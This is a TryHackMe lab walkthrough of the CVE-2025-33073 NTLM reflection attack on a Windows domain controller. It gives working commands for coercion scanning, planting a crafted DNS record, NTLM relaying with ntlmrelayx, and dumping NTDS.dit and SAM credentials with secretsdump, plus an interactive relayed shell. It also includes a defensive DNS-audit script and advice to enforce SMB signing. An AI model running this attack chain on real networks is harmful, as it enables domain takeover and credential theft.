CVE-2025-33073

NTLM Reflection: CVE-2025-33073 - TryHackMe Walkthrough

Introduction

This walkthrough covers CVE-2025-33073, an NTLM reflection vulnerability that lets an attacker coerce a Windows host into authenticating and then reflect that NTLM authentication back to the same host. In this TryHackMe writeup, we explore how to identify and exploit the vulnerability in a Windows Active Directory environment. The walkthrough follows the complete attack chain, from reconnaissance to credential dumping, so that penetration testers and security professionals can understand how this variant of the NTLM relay attack works.

Initial Reconnaissance - Nmap Scan

Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-11-21 18:52:32Z)
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: reflection.thm0., Site: Default-First-Site-Name)
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack Microsoft Windows RPC

Initial Credentials

We already have a set of credentials to work with:

sawan:R3flect0r

Testing for Coercion Vulnerabilities

First, we’ll check for authentication coercion vulnerabilities using the NetExec coerce_plus module:

netexec smb 10.49.132.212 -u sawan -p R3flect0r -M coerce_plus

The scan reveals that the target has four different coercion methods available:

VULNERABLE, DFSCoerce
VULNERABLE, PetitPotam
VULNERABLE, PrinterBug
VULNERABLE, PrinterBug

Important Note: The scan also reports signing:False, which is crucial for this attack. If SMB signing were required, the reflected session would be rejected and the NTLM reflection attack could not proceed.

Testing for NTLM Reflection Vulnerability

Recent NetExec versions include an ntlm_reflection module that checks whether the target is vulnerable to NTLM reflection (CVE-2025-33073):

netexec smb 10.49.132.212 -u sawan -p R3flect0r -M ntlm_reflection

The result confirms the vulnerability:

VULNERABLE (can relay SMB to any protocol on 10.49.132.212)

Exploitation: Creating the Malicious DNS Entry

For the exploitation phase, we need a specially crafted DNS entry that resolves to our attacking machine. The record name is the hostname “localhost” with marshalled target information appended, which is what tricks the LsapCheckMarshalledTargetInfo function: once that function strips the marshalled data, the remaining target name is “localhost”, while the DNS record itself still resolves to our IP address.

python3 dnstool.py -u 'reflection.thm'\\'sawan' -p 'R3flect0r' --action add --record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA --data <ATTACKER_IP> <TARGET_IP>

Verifying the DNS Entry

Next, we verify that the DNS entry has been successfully created:

python3 dnstool.py -u 'reflection.thm'\\'sawan' -p 'R3flect0r' --action query --record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA --data <ATTACKER_IP> <TARGET_IP>

We should receive the following confirmation:

[+] Bind OK
[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
DC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.thm,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=thm
[+] Record entry:
- Type: 1 (A) (Serial: 172)
- Address: 192.168.139.150
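The record above is the hostname localhost with a marshalled target-info blob appended, and the whole attack hinges on that blob being stripped before the name is compared. From the defender's side, the same shape is what to hunt for in AD-integrated DNS. The Python below is an added example, not part of the original walkthrough and not code from NetExec, impacket or dnstool.py: it mimics the stripping step and audits a list of zone records for names of that shape, and for reserved names such as localhost resolving to a non-loopback address. It treats "1U" as the marker between hostname and blob, which is an assumption inferred from the record name shown on this page rather than from a documented format; the sample records are constructed, with only the lure name and its 192.168.139.150 address taken from the dnstool.py output above.

```python
import ipaddress
import re
from dataclasses import dataclass

# A DNS record name shaped like the lure on this page: a plain hostname
# ("localhost") immediately followed by "1U" and a long base64-looking run.
# ASSUMPTION: "1U" is treated as the marker that separates the hostname from
# the marshalled target-info blob; this is inferred from the record name shown
# in the walkthrough, not taken from a documented format.
MARSHALLED_NAME_RE = re.compile(
    r"^(?P<base>[A-Za-z0-9-]+?)1U(?P<blob>[A-Za-z0-9+/#=-]{16,})$"
)

# Names a coerced host would treat as itself; these must never resolve to a
# foreign address inside the AD zone.
SELF_NAMES = {"localhost"}


@dataclass(frozen=True)
class DnsRecord:
    name: str      # record name relative to the zone, e.g. "dc01"
    rtype: str     # "A", "AAAA", "CNAME", ...
    data: str      # address for A/AAAA records


def split_marshalled_name(name: str):
    """Mimic the stripping step: return (hostname, blob) when the name carries
    a marshalled suffix, otherwise (name, None)."""
    m = MARSHALLED_NAME_RE.match(name)
    if m is None:
        return name, None
    return m.group("base"), m.group("blob")


def is_loopback(address: str) -> bool:
    """True for 127.0.0.0/8 and ::1; False for anything else or non-addresses."""
    try:
        return ipaddress.ip_address(address).is_loopback
    except ValueError:
        return False


def audit_records(records):
    """Return (record_name, reason) findings for address records that could act
    as reflection lures."""
    findings = []
    for rec in records:
        if rec.rtype not in ("A", "AAAA"):
            continue
        base, blob = split_marshalled_name(rec.name)
        if blob is not None:
            findings.append((rec.name,
                             f"marshalled suffix appended to hostname '{base}' "
                             f"(resolves to {rec.data})"))
        elif base.lower() in SELF_NAMES and not is_loopback(rec.data):
            findings.append((rec.name,
                             f"reserved name resolves to non-loopback {rec.data}"))
    return findings


# Constructed sample zone contents. The lure name and its address come from the
# dnstool.py query output on the page; the other records are made up.
SAMPLE_RECORDS = [
    DnsRecord("dc01", "A", "10.49.132.212"),
    DnsRecord("localhost", "A", "127.0.0.1"),
    DnsRecord("build1Uabc", "A", "10.49.132.50"),        # short "1U" run: benign
    DnsRecord("localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA", "A",
              "192.168.139.150"),
]


if __name__ == "__main__":
    for name, reason in audit_records(SAMPLE_RECORDS):
        print(f"[!] {name}: {reason}")
```

Feed it the output of a zone dump (for example every record name returned by dnstool.py queries, or an export from the DNS server) and any hit is worth investigating: ordinary hostnames do not carry a 40-character base64 tail, and nothing in a production zone should make "localhost" point at a foreign host. Because the check only looks at the shape of the name and the address family, it runs offline against a snapshot and needs no domain connectivity.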

Setting Up the NTLM Relay

Now we start ntlmrelayx listening for SMB connections, with the victim machine as the relay target. Because the target is a Domain Controller rather than a workstation, we use SOCKS so that the NTDS.dit database can be dumped through the relayed session:

sudo ntlmrelayx.py -t smb://10.49.132.212 -smb2support -socks

Triggering the Coercion

In another terminal, we initiate the coercion attack:

netexec smb 10.49.132.212 -u sawan -p R3flect0r -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

Dumping Domain Credentials

Finally, once the relayed session is established, we use proxychains to dump all credentials from the Domain Controller through the SOCKS proxy. Make sure /etc/proxychains4.conf contains the line: socks4 127.0.0.1 1080

proxychains4 -q impacket-secretsdump 10.49.132.212 -no-pass -just-dc -use-vss

Alternative Exploitation Methods

There are additional ways to abuse this CVE depending on the target type.

For Workstations: Dumping SAM

ntlmrelayx.py -t smb://10.10.119.187 -smb2support --no-http-server

Getting an Interactive Shell

ntlmrelayx.py -t smb://10.10.119.187 -smb2support -i

Then connect to the shell:

nc 127.0.0.1 11000

Further Reading and Resources

For an in-depth technical analysis of how this exploit works, including Kerberos-based attacks, check out this excellent post:

NTLM Reflection is Dead, Long Live NTLM Reflection - Synacktiv

Try this challenge yourself on TryHackMe:
NTLM Reflection CVE-2025-33073 Room

Conclusion

CVE-2025-33073 demonstrates the critical importance of enabling SMB signing and properly securing authentication protocols in Windows environments. This TryHackMe walkthrough showcases how a seemingly minor misconfiguration can lead to complete domain compromise. Always ensure SMB signing is enforced and regularly audit your Active Directory environment for such vulnerabilities.